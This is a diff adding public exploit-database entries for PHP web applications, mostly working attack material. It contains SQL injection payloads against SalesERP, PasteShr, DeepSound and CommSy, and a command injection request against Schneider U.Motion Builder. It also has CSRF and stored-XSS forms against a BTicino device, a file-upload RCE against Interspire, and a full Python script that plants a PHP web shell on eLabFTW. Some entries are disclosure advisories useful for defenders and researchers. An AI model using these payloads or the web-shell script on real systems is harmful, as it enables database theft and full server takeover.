+http://localhost/erpbusiness/SalesERPv810/Ccustomer/paid_customer_search_item?customer_id=99999999[SQL
+Inject Here]
+===========================================================================================
+###########################################################################################
+===========================================================================================
+# Exploit Title: SalesERP v.8.1 SQL Inj.
+# Dork: N/A
+# Date: 13-05-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage:
+https://codecanyon.net/category/php-scripts?term=sales%20erp
+# Version: v8.1
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: ERP is a Modern and responsvie small Business
+management system.
+It is developed by PHP and Codeginiter framework. It is design and develop
+for thinking shop,
+small business, company and any types of business.Here has accounting,
+management, invoice,user and data analysis.
+===========================================================================================
+# POC - SQLi
+# Parameters : supplier_name
+# Attack Pattern :
+%27/**/RLIKE/**/(case/**/when/**//**/4190707=4190707/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'='
+# POST Method :
+http://localhost/erpbusiness/SalesERPv810/Csupplier/search_supplier?supplier_name=2900757&supplier_id=[SQL
+Inject Here]
+===========================================================================================
+###########################################################################################
+===========================================================================================
+# Exploit Title: SalesERP v.8.1 SQL Inj.
+# Dork: N/A
+# Date: 13-05-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage:
+https://codecanyon.net/category/php-scripts?term=sales%20erp
+# Version: v8.1
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: ERP is a Modern and responsvie small Business
+management system.
+It is developed by PHP and Codeginiter framework. It is design and develop
+for thinking shop,
+small business, company and any types of business.Here has accounting,
+management, invoice,user and data analysis.
+===========================================================================================
+# POC - SQLi
+# Parameters : supplier_name
+# Attack Pattern : 1260781%27 oR
+if(length(0x454d49524f474c55)>1,sleep(3),0) --%20
+# POST Method :
+http://localhost/erpbusiness/SalesERPv810/Cproduct/add_supplier?add-supplier=Save&address=[TEXT
+INPUT]4990130&details=[TEXT INPUT]5207543&supplier_name=[SQL Inject Here]
+===========================================================================================
\ No newline at end of file
diff --git a/exploits/php/webapps/46846.txt b/exploits/php/webapps/46846.txt
new file mode 100644
index 000000000..08f202e6b
--- /dev/null
+++ b/exploits/php/webapps/46846.txt
@@ -0,0 +1,109 @@
+RCE Security Advisory
+https://www.rcesecurity.com
+
+
+1. ADVISORY INFORMATION
+=======================
+Product:        Schneider Electric U.Motion Builder
+Vendor URL:     www.schneider-electric.com
+Type:           OS Command Injection [CWE-78]
+Date found:     2018-11-15
+Date published: 2019-05-13
+CVSSv3 Score:   9.8 (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
+CVE:            CVE-2018-7841
+
+
+2. CREDITS
+==========
+This vulnerability was discovered and researched by Julien Ahrens from
+RCE Security.
+
+
+3. VERSIONS AFFECTED
+====================
+Schneider Electric U.Motion Builder 1.3.4 and below
+
+
+4. INTRODUCTION
+===============
+Comfort, Security and Energy Efficiency – these are the qualities that you as
+home owner expect from a futureproof building management solution.
+
+(from the vendor's homepage)
+
+
+5. VULNERABILITY DETAILS
+========================
+The script "track_import_export.php" is vulnerable to an unauthenticated
+command injection vulnerability when user-supplied input to the HTTP GET/POST
+parameter "object_id" is processed by the web application. Since the application
+does not properly validate and sanitize this parameter, it is possible to inject
+arbitrary commands into a PHP exec call. This is a bypass to the fix implemented
+for CVE-2018-7765.
+
+The following Proof-of-Concept triggers this vulnerability causing a 10 seconds
+sleep:
+
+POST /smartdomuspad/modules/reporting/track_import_export.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko/20100101 Firefox/63.0
+Accept: /
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Connection: close
+Cookie: PHPSESSID=l337qjbsjk4js9ipm6mppa5qn4
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 86
+
+op=export&language=english&interval=1&object_id=`sleep 10`
+
+
+6. RISK
+=======
+To successfully exploit this vulnerability an unauthenticated attacker must only
+have network-level access to a vulnerable instance of U.Motion Builder or a product
+that depends on it.
+
+The vulnerability can be used to inject arbitrary OS commands, which leads to the
+complete compromise of the affected installation.
+
+
+7. SOLUTION
+===========
+Uninstall/remove the installation.
+
+The product has been retired shortly after notifying the vendor about this issue,
+so no fix will be published.
+
+
+8. REPORT TIMELINE
+==================
+2018-11-14: Discovery of the vulnerability
+2018-11-14: Tried to notify vendor via their vulnerability report form
+            but unfortunately the form returned some 403 error
+2018-11-14: Tried to contact the vendor via Twitter (public tweet and DM)
+2018-11-19: No response from vendor
+2018-11-20: Tried to contact the vendor via Twitter again
+2018-11-20: No response from vendor
+2019-01-04: Without further notice the contact form worked again. Sent over
+            the vulnerability details.
+2019-01-04: Response from the vendor stating that the affected code is owned by
+            a third-party vendor. Projected completion time is October 2019.
+2019-01-10: Scheduled disclosure date is set to 2019-01-22 based on policy.
+2019-01-14: Vendor asks to extend the disclosure date to 2019-03-15.
+2019-01-15: Agreed on the disclosure extension due to the severity of the issue
+2019-02-01: No further reply from vendor. Reminded them of the regular status
+            updates according to the disclosure policy
+2019-02-04: Regular status updates from vendor from now on
+2019-03-13: Vendor sends draft disclosure notification including assigned
+            CVE-2018-7841. The draft states that the product will be retired
+            and has already been removed from the download portal. A customer
+            notification is published (SEVD-2019-071-02).
+2019-03-14: Public disclosure is delayed to give the vendor's customers a chance
+            to remove the product.
+2019-05-13: Public disclosure
+
+
+9. REFERENCES
+=============
+https://www.rcesecurity.com/2019/05/cve-2018-7841-schneider-electric-umotion-builder-remote-code-execution-0-day
\ No newline at end of file
diff --git a/exploits/php/webapps/46847.txt b/exploits/php/webapps/46847.txt
new file mode 100644
index 000000000..502195b7e
--- /dev/null
+++ b/exploits/php/webapps/46847.txt
@@ -0,0 +1,78 @@
+===========================================================================================
+# Exploit Title: PasteShr - SQL İnj.
+# Dork: N/A
+# Date: 14-05-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage:
+https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437
+# Software Link:
+https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html
+# Version: v1.6
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: Pasteshr is a script which allows you to store any
+text online for easy sharing.
+The idea behind the script is to make it more convenient for people to
+share large amounts of text online.
+===========================================================================================
+# POC - SQLi
+# Parameters : keyword
+# Attack Pattern :
+%27/**/RLIKE/**/(case/**/when/**//**/9494586=9494586/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'='
+# GET Method : http://localhost/pasthr/public/search?keyword=4137548[SQL
+Inject Here]
+===========================================================================================
+###########################################################################################
+===========================================================================================
+# Exploit Title: PasteShr - SQL İnj.
+# Dork: N/A
+# Date: 14-05-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage:
+https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437
+# Software Link:
+https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html
+# Version: v1.6
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: Pasteshr is a script which allows you to store any
+text online for easy sharing.
+The idea behind the script is to make it more convenient for people to
+share large amounts of text online.
+===========================================================================================
+# POC - SQLi
+# Parameters : password
+# Attack Pattern :
+/**/RLIKE/**/(case/**/when/**//**/6787556=6787556/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)
+# POST Method :
+http://localhost/pasthr/public/login?_token=1lkW1Z61RZlmfYB0Ju07cfekR6UvsqaFAfeZfi2c&email=2270391&password=6195098[SQL
+Inject Here]
+===========================================================================================
+###########################################################################################
+===========================================================================================
+# Exploit Title: PasteShr - SQL İnj.
+# Dork: N/A
+# Date: 14-05-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage:
+https://codecanyon.net/item/pasteshr-text-hosting-sharing-script/23019437
+# Software Link:
+https://www.codelist.cc/scripts/236331-pasteshr-v16-text-hosting-sharing-script.html
+# Version: v1.6
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: Pasteshr is a script which allows you to store any
+text online for easy sharing.
+The idea behind the script is to make it more convenient for people to
+share large amounts of text online.
+===========================================================================================
+# POC - SQLi
+# Parameters : keyword
+# Attack Pattern :
+%27/**/RLIKE/**/(case/**/when/**//**/8266715=8266715/**/then/**/0x454d49524f474c55/**/else/**/0x28/**/end)/**/and/**/'%'='
+# POST Method :
+http://localhost/pasthr/server.php/search?keyword=1901418[SQL Inject Here]
+===========================================================================================
\ No newline at end of file
diff --git a/exploits/php/webapps/46849.txt b/exploits/php/webapps/46849.txt
new file mode 100644
index 000000000..74871475f
--- /dev/null
+++ b/exploits/php/webapps/46849.txt
@@ -0,0 +1,56 @@
+Title:
+======
+CommSy 8.6.5 - SQL injection
+
+Researcher:
+===========
+Jens Regel, Schneider & Wulf EDV-Beratung GmbH & Co. KG
+
+CVE-ID:
+=======
+CVE-2019-11880
+
+Timeline:
+=========
+2019-04-15 Vulnerability discovered
+2019-04-15 Asked for security contact and PGP key
+2019-04-16 Send details to the vendor
+2019-05-07 Flaw was approved but will not be fixed in branch 8.6
+2019-05-15 Public disclosure
+
+Affected Products:
+==================
+CommSy <= 8.6.5
+
+Vendor Homepage:
+================
+https://www.commsy.net
+
+Details:
+========
+CommSy is a web-based community system, originally developed at the
+University of Hamburg, Germany, to support learning/working communities.
+We have discovered a unauthenticated SQL injection vulnerability in
+CommSy <= 8.6.5 that makes it possible to read all database content. The
+vulnerability exists in the HTTP GET parameter "cid".
+
+Proof of Concept:
+=================
+boolean-based blind:
+commsy.php?cid=101" AND 3823=(SELECT (CASE WHEN (3823=3823) THEN 3823
+ELSE (SELECT 7548 UNION SELECT 4498) END))-- dGRD&mod=context&fct=login
+
+error-based:
+commsy.php?cid=101" AND (SELECT 6105 FROM(SELECT
+COUNT(*),CONCAT(0x716a767871,(SELECT
+(ELT(6105=6105,1))),0x716b6a6b71,FLOOR(RAND(0)*2))x FROM
+INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- jzQs&mod=context&fct=login
+
+time-based blind:
+commsy.php?cid=101" AND SLEEP(5)-- MjJM&mod=context&fct=login
+
+Fix:
+====
+According to the manufacturer, the version branch 8.6 is no longer
+supported and the vulnerability will not be fixed. Customers should
+update to the newest version 9.2.
\ No newline at end of file
diff --git a/exploits/php/webapps/46850.txt b/exploits/php/webapps/46850.txt
new file mode 100644
index 000000000..36053e8bb
--- /dev/null
+++ b/exploits/php/webapps/46850.txt
@@ -0,0 +1,118 @@
+<!--
+
+Legrand BTicino Driver Manager F454 1.0.51 CSRF Change Password Exploit
+
+
+Vendor: BTicino S.p.A.
+Product web page: https://www.bticino.com
+
+Affected version: Hardware Platform: F454
+                  Firmware version: 1.0.51
+                  Driver Manager version: 1.1.14
+
+Summary: Audio/video web server for the remote control of the
+system using web pages or the MY HOME portal. The device can
+operate as a gateway for the use of the MHVisual and Virtual
+Configurator software - 6 DIN modules. It replaces item F453
+and F453AV.
+
+Desc: The application interface allows users to perform certain
+actions via HTTP requests without performing any validity checks
+to verify the requests. This can be exploited to perform certain
+actions with administrative privileges if a logged-in user visits
+a malicious web site.
+
+Tested on: Apache/2.2.14 (Unix)
+           OpenSSL/1.0.0d
+           PHP/5.1.6
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                                  @zeroscience
+
+
+Advisory ID: ZSL-2019-5521
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5521.php
+
+30.04.2019
+
+-->
+
+
+<!-- CSRF PoC web access password change -->
+<html>
+  <body>
+    <form action="http://192.168.1.66:8080/system/password.save.php" method="POST">
+      <input type="hidden" name="password1" value="newpass123" />
+      <input type="hidden" name="password2" value="newpass123" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+
+<!-- CSRF PoC OpenWebNet password change -->
+<html>
+  <body>
+    <form action="http://192.168.1.66:8080/system/ownpassword.save.php" method="POST">
+      <input type="hidden" name="ownpassword" value="ilegnisi" />
+      <input type="submit" value="Submit request" />
+    </form>
+  </body>
+</html>
+
+
+<!--
+
+Legrand BTicino Driver Manager F454 1.0.51 Authenticated Stored XSS Exploit
+
+
+Vendor: BTicino S.p.A.
+Product web page: https://www.bticino.com
+
+Affected version: Hardware Platform: F454
+                  Firmware version: 1.0.51
+                  Driver Manager version: 1.1.14
+
+Summary: Audio/video web server for the remote control of the
+system using web pages or the MY HOME portal. The device can
+operate as a gateway for the use of the MHVisual and Virtual
+Configurator software - 6 DIN modules. It replaces item F453
+and F453AV.
+
+Desc: The application suffers from an authenticated stored XSS
+via GET request. The issue is triggered when input passed via
+the GET parameter 'server' is not properly sanitized before
+being returned to the user. This can be exploited to execute
+arbitrary HTML and script code in a user's browser session in
+context of an affected site.
+
+Tested on: Apache/2.2.14 (Unix)
+           OpenSSL/1.0.0d
+           PHP/5.1.6
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                                  @zeroscience
+
+
+Advisory ID: ZSL-2019-5522
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5522.php
+
+30.04.2019
+
+-->
+
+
+<!-- Stored XSS via GET request -->
+<html>
+  <body>
+    <form action="http://192.168.1.66:8080/system/time.ntp.php">
+      <input type="hidden" name="mode" value="mine" />
+      <input type="hidden" name="server" value='"><marquee>Waddup.</marquee>' />
+      <input type="submit" value="Signal" />
+    </form>
+  </body>
+</html>
+
+<!-- GET http://192.168.1.66:8080/system/time.ntp.php?mode=mine&server="><marquee>Waddup.</marquee> HTTP/1.1 -->
\ No newline at end of file
diff --git a/exploits/php/webapps/46852.txt b/exploits/php/webapps/46852.txt
new file mode 100644
index 000000000..0b94fa49d
--- /dev/null
+++ b/exploits/php/webapps/46852.txt
@@ -0,0 +1,66 @@
+===========================================================================================
+# Exploit Title: DeepSound 1.0.4 - SQL Inj.
+# Dork: N/A
+# Date: 15-05-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage:
+https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
+# Version: v1.0.4
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: DeepSound is a music sharing script, DeepSound is
+the best way to start your own music website!
+===========================================================================================
+# POC - SQLi
+# Parameters : search_keyword
+# Attack Pattern : %27 aNd 9521793=9521793 aNd %276199%27=%276199
+# POST Method :
+http://localhost/Script/search/songs/style?filter_type=songs&filter_search_keyword=style&search_keyword=style[SQL
+Inject Here]
+===========================================================================================
+###########################################################################################
+===========================================================================================
+# Exploit Title: DeepSound 1.0.4 - SQL Inj.
+# Dork: N/A
+# Date: 15-05-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage:
+https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
+# Version: v1.0.4
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: DeepSound is a music sharing script, DeepSound is
+the best way to start your own music website!
+===========================================================================================
+# POC - SQLi
+# Parameters : description
+# Attack Pattern : %27) aNd if(length(0x454d49524f474c55)>1,sleep(3),0)
+--%20
+# POST Method : http://localhost/Script/admin?id=&description=[TEXT
+INPUT]2350265[SQL Inject Here]
+===========================================================================================
+###########################################################################################
+===========================================================================================
+# Exploit Title: DeepSound 1.0.4 - SQL Inj.
+# Dork: N/A
+# Date: 15-05-2019
+# Exploit Author: Mehmet EMIROGLU
+# Vendor Homepage:
+https://codecanyon.net/item/deepsound-the-ultimate-php-music-sharing-platform/23609470
+# Version: v1.0.4
+# Category: Webapps
+# Tested on: Wamp64, Windows
+# CVE: N/A
+# Software Description: DeepSound is a music sharing script, DeepSound is
+the best way to start your own music website!
+===========================================================================================
+# POC - SQLi
+# Parameters : password
+# Attack Pattern : %22) aNd 7595147=7595147 aNd (%226199%22)=(%226199
+# POST Method :
+http://localhost/Script/search/songs/general?username=4929700&password=2802530[SQL
+Inject Here]
+===========================================================================================
+###########################################################################################
\ No newline at end of file
diff --git a/exploits/php/webapps/46864.txt b/exploits/php/webapps/46864.txt
new file mode 100644
index 000000000..aff14fb5d
--- /dev/null
+++ b/exploits/php/webapps/46864.txt
@@ -0,0 +1,96 @@
+# Exploit Title: Interspire Email Marketer 6.20 - Remote Code Execution
+# Date: May 2019
+# Exploit Author: Numan Türle
+# Vendor Homepage: https://www.interspire.com
+# Software Link: https://www.interspire.com/emailmarketer
+# Version: 6.20< 
+# Tested on: windows
+# CVE : CVE-2018-19550
+# https://medium.com/@numanturle/interspire-email-marketer-6-20-exp-remote-code-execution-via-uplaod-files-27ef002ad813
+
+
+surveys_submit.php
+if (isset($_FILES['widget']['name'])) {
+             $files = $_FILES['widget']['name'];
+
+             foreach ($files as $widgetId => $widget) {
+                 foreach ($widget as $widgetKey => $fields) {
+                     foreach ($fields as $fieldId => $field) {
+                         // gather file information
+                         $name    = $_FILES['widget']['name'][$widgetId]['field'][$fieldId]['value'];
+                         $type    = $_FILES['widget']['type'][$widgetId]['field'][$fieldId]['value'];
+                         $tmpName = $_FILES['widget']['tmp_name'][$widgetId]['field'][$fieldId]['value'];
+                         $error   = $_FILES['widget']['error'][$widgetId]['field'][$fieldId]['value'];
+                         $size    = $_FILES['widget']['size'][$widgetId]['field'][$fieldId]['value'];
+
+                         // if the upload was successful to the temporary folder, move it
+                         if ($error == UPLOAD_ERR_OK) {
+                             $tempdir   = TEMP_DIRECTORY;
+                             $upBaseDir = $tempdir . DIRECTORY_SEPARATOR . 'surveys';
+                             $upSurveyDir = $upBaseDir . DIRECTORY_SEPARATOR . $formId;
+                             $upDir     = $upSurveyDir . DIRECTORY_SEPARATOR . $response->GetId();
+
+                             // if the base upload directory doesn't exist create it
+                             if (!is_dir($upBaseDir)) {
+                                 mkdir($upBaseDir, 0755);
+                             }
+
+                             if (!is_dir($upSurveyDir)) {
+                                 mkdir($upSurveyDir, 0755);
+                             }
+
+                             // if the upload directory doesn't exist create it
+                             if (!is_dir($upDir)) {
+                                 mkdir($upDir, 0755);
+                             }
+
+                             // upload the file
+                             move_uploaded_file($tmpName, $upDir . DIRECTORY_SEPARATOR . $name);
+                         }
+                     }
+                 }
+             }
+         }
+
+input file name : widget[0][field][][value]
+submit : surveys_submit.php?formId=1337
+
+
+POST /iem/surveys_submit.php?formId=1337 HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36
+Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryF2dckZgrcE306kH2
+Content-Length: 340
+
+------WebKitFormBoundaryF2dckZgrcE306kH2
+Content-Disposition: form-data; name="widget[0][field][][value]"; filename="info.php"
+Content-Type: application/octet-stream
+
+<?php
+phpinfo();
+?>
+------WebKitFormBoundaryF2dckZgrcE306kH2
+Content-Disposition: form-data; name="submit"
+
+Submit
+------WebKitFormBoundaryF2dckZgrcE306kH2-
+
+####
+
+POC
+
+<!DOCTYPE HTML>
+<html lang="en-US">
+<head>
+    <meta charset="UTF-8">
+    <title></title>
+</head>
+<body>
+<form action="http://WEBSITE/surveys_submit.php?formId=1337" method="post" enctype="multipart/form-data">
+    <input type="file" name="widget[0][field][][value]">
+    <input type="submit" value="submit" name="submit">
+</form>
+</body>
+</html>
+
+URL : http://{{IEM LINK}}/admin/temp/surveys/1337/{{FUZZING NUMBER}}/{{FILENAME}}
\ No newline at end of file
diff --git a/exploits/php/webapps/46869.py b/exploits/php/webapps/46869.py
new file mode 100755
index 000000000..bfbe9a4e7
--- /dev/null
+++ b/exploits/php/webapps/46869.py
@@ -0,0 +1,166 @@
+#!/usr/bin/env python
+#
+# Exploit Title         : eLabFTW 1.8.5 'EntityController' Arbitrary
+File Upload / RCE
+# Date                  : 5/18/19
+# Exploit Author        : liquidsky (JMcPeters)
+# Vulnerable Software   : eLabFTW 1.8.5
+# Vendor Homepage       : https://www.elabftw.net/
+# Version               : 1.8.5
+# Software Link         : https://github.com/elabftw/elabftw
+# Tested On             : Linux / PHP Version 7.0.33 / Default
+installation (Softaculous)
+# Author Site : http://incidentsecurity.com | https://github.com/fuzzlove
+#
+# Greetz : wetw0rk, offsec ^^
+#
+# Description: eLabFTW 1.8.5 is vulnerable to arbitrary file uploads
+via the /app/controllers/EntityController.php component.
+# This may result in remote command execution. An attacker can use a
+user account to fully compromise the system using a POST request.
+# This will allow for PHP files to be written to the web root, and for
+code to execute on the remote server.
+#
+# Notes: Once this is done a php shell will drop at https://[target
+site]/[elabftw directory]/uploads/[random 2 alphanum]/[random long
+alphanumeric].php5?e=whoami
+# You will have to visit the uploads directory on the site to see what
+the name is. However there is no protection against directory listing.
+# So this can be done by an attacker remotely.
+
+import requests
+from bs4 import BeautifulSoup as bs4
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+import sys
+import time
+
+print "+-------------------------------------------------------------+"
+print
+print "- eLabFTW 1.8.5 'EntityController' Arbitrary File Upload / RCE"
+print
+print "-          Discovery / PoC by liquidsky (JMcPeters) ^^"
+print
+print "+-------------------------------------------------------------+"
+
+try:
+
+target = sys.argv[1]
+email = sys.argv[2]
+password = sys.argv[3]
+directory = sys.argv[4]
+
+except IndexError:
+
+        print
+print "- Usage: %s <target> <email> <password> <directory>" % sys.argv[0]
+print "- Example: %s incidentsecurity.com user@email.com mypassword
+elabftw" % sys.argv[0]
+        print
+sys.exit()
+
+
+proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}
+
+# The payload to send
+data = ""
+data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
+data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x37"
+data += "\x32\x31\x36\x37\x35\x39\x38\x31\x31\x30\x38\x37\x34\x35\x39"
+data += "\x34\x31\x31\x31\x36\x33\x30\x33\x39\x35\x30\x37\x37\x0d\x0a"
+data += "\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69"
+data += "\x74\x69\x6f\x6e\x3a\x20\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61"
+data += "\x3b\x20\x6e\x61\x6d\x65\x3d\x22\x75\x70\x6c\x6f\x61\x64\x22"
+data += "\x0d\x0a\x0d\x0a\x74\x72\x75\x65\x0d\x0a\x2d\x2d\x2d\x2d\x2d"
+data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
+data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x37\x32\x31\x36\x37\x35"
+data += "\x39\x38\x31\x31\x30\x38\x37\x34\x35\x39\x34\x31\x31\x31\x36"
+data += "\x33\x30\x33\x39\x35\x30\x37\x37\x0d\x0a\x43\x6f\x6e\x74\x65"
+data += "\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69\x6f\x6e\x3a"
+data += "\x20\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x3b\x20\x6e\x61\x6d"
+data += "\x65\x3d\x22\x69\x64\x22\x0d\x0a\x0d\x0a\x34\x0d\x0a\x2d\x2d"
+data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
+data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x37\x32\x31"
+data += "\x36\x37\x35\x39\x38\x31\x31\x30\x38\x37\x34\x35\x39\x34\x31"
+data += "\x31\x31\x36\x33\x30\x33\x39\x35\x30\x37\x37\x0d\x0a\x43\x6f"
+data += "\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69"
+data += "\x6f\x6e\x3a\x20\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x3b\x20"
+data += "\x6e\x61\x6d\x65\x3d\x22\x74\x79\x70\x65\x22\x0d\x0a\x0d\x0a"
+data += "\x65\x78\x70\x65\x72\x69\x6d\x65\x6e\x74\x73\x0d\x0a\x2d\x2d"
+data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
+data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x37\x32\x31"
+data += "\x36\x37\x35\x39\x38\x31\x31\x30\x38\x37\x34\x35\x39\x34\x31"
+data += "\x31\x31\x36\x33\x30\x33\x39\x35\x30\x37\x37\x0d\x0a\x43\x6f"
+data += "\x6e\x74\x65\x6e\x74\x2d\x44\x69\x73\x70\x6f\x73\x69\x74\x69"
+data += "\x6f\x6e\x3a\x20\x66\x6f\x72\x6d\x2d\x64\x61\x74\x61\x3b\x20"
+data += "\x6e\x61\x6d\x65\x3d\x22\x66\x69\x6c\x65\x22\x3b\x20\x66\x69"
+data += "\x6c\x65\x6e\x61\x6d\x65\x3d\x22\x70\x6f\x63\x33\x2e\x70\x68"
+data += "\x70\x35\x22\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79"
+data += "\x70\x65\x3a\x20\x61\x70\x70\x6c\x69\x63\x61\x74\x69\x6f\x6e"
+data += "\x2f\x78\x2d\x70\x68\x70\x0d\x0a\x0d\x0a\x3c\x3f\x70\x68\x70"
+data += "\x20\x65\x63\x68\x6f\x20\x73\x68\x65\x6c\x6c\x5f\x65\x78\x65"
+data += "\x63\x28\x24\x5f\x47\x45\x54\x5b\x27\x65\x27\x5d\x2e\x27\x20"
+data += "\x32\x3e\x26\x31\x27\x29\x3b\x20\x3f\x3e\x0d\x0a\x2d\x2d\x2d"
+data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d"
+data += "\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x37\x32\x31\x36"
+data += "\x37\x35\x39\x38\x31\x31\x30\x38\x37\x34\x35\x39\x34\x31\x31"
+data += "\x31\x36\x33\x30\x33\x39\x35\x30\x37\x37\x2d\x2d\x0d\x0a"
+
+s = requests.Session()
+
+print "[*] Visiting eLabFTW Site"
+r = s.get('https://' + target + '/' + directory +
+'/login.php',verify=False, proxies=proxies)
+print "[x]"
+
+# Grabbing token
+html_bytes = r.text
+soup = bs4(html_bytes, 'lxml')
+token = soup.find('input', {'name':'formkey'})['value']
+
+values = {'email': email,
+          'password': password,
+          'formkey': token,}
+
+time.sleep(2)
+
+print "[*] Logging in to eLabFTW"
+
+r = s.post('https://' + target + '/' + directory +
+'/app/controllers/LoginController.php', data=values, verify=False,
+proxies=proxies)
+
+print "[x] Logged in :)"
+
+time.sleep(2)
+
+sessionId = s.cookies['PHPSESSID']
+
+headers = {
+    #POST /elabftw/app/controllers/EntityController.php HTTP/1.1
+    #Host: incidentsecurity.com
+    "User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:52.0)
+Gecko/20100101 Firefox/52.0",
+    "Accept": "application/json",
+    "Accept-Language": "en-US,en;q=0.5",
+    "Accept-Encoding": "gzip, deflate",
+    #Referer: https://incidentsecurity.com
+    "Cache-Control": "no-cache",
+    "X-Requested-With": "XMLHttpRequest",
+    "Content-Length": "588",
+    "Content-Type": "multipart/form-data;
+boundary=---------------------------72167598110874594111630395077",
+    "Connection": "close",
+    "Cookie": "PHPSESSID=" + sessionId + ";" + "token=" + token
+}
+
+print "[*] Sending payload..."
+r = s.post('https://' + target + '/' + directory +
+'/app/controllers/EntityController.php',verify=False, headers=headers,
+data=data, proxies=proxies)
+print "[x] Payload sent"
+print
+print "Now check https://%s/%s/uploads" % (target, directory)
+print "Your php shell will be there under a random name (.php5)"
+print
+print "i.e https://[vulnerable
+site]/elabftw/uploads/60/6054a32461de6294843b7f7ea9ea2a34a19ca420752b087c87011144fc83f90b9aa5bdcdce5dee132584f6da45b7ec9e3841405e9d67a7d196f064116cf2da38.php5?e=whoami"
\ No newline at end of file
diff --git a/exploits/php/webapps/46881.txt b/exploits/php/webapps/46881.txt
new file mode 100644
index 000000000..dbae482c5
--- /dev/null
+++ b/exploits/php/webapps/46881.txt
@@ -0,0 +1,34 @@
+# Exploit Title: Moodle filter_jmol multiple vulnerabilities (Directory Traversal and XSS)
+# Date: 20 May 2019
+# Exploit Author: Dionach Ltd
+# Exploit Author Homepage: https://www.dionach.com/blog/moodle-jmol-plugin-multiple-vulnerabilities
+# Software Link: https://moodle.org/plugins/filter_jmol
+# Version: <=6.1
+# Tested on: Debian
+
+The Jmol/JSmol plugin for the Moodle Learning Management System displays chemical structures in Moodle using Java and JavaScript. The plugin implements a PHP server-side proxy in order to load third party resources bypassing client-side security restrictions. This PHP proxy script calls the function file_get_contents() on unvalidated user input.
+
+This makes Moodle instances with this plugin installed vulnerable to directory traversal and server-side request forgery in the default PHP setup, and if PHP's "expect" wrapper is enabled, also to remote code execution. Other parameters in the plugin are also vulnerable to reflected cross-site scripting. Note that authentication is not required to exploit these vulnerabilities.
+
+The JSmol Moodle plugin was forked from the JSmol project, where the directory traversal and server-side request forgery vulnerability was partially fixed in 2015.
+
+* Plugin: https://moodle.org/plugins/pluginversions.php?plugin=filter_jmol
+* Note on functionality: https://github.com/geoffrowland/moodle-filter_jmol/blob/master/js/jsmol/php/jsmol.php#L14
+* Vulnerability announcement: https://sourceforge.net/p/jmol/mailman/message/33627649/
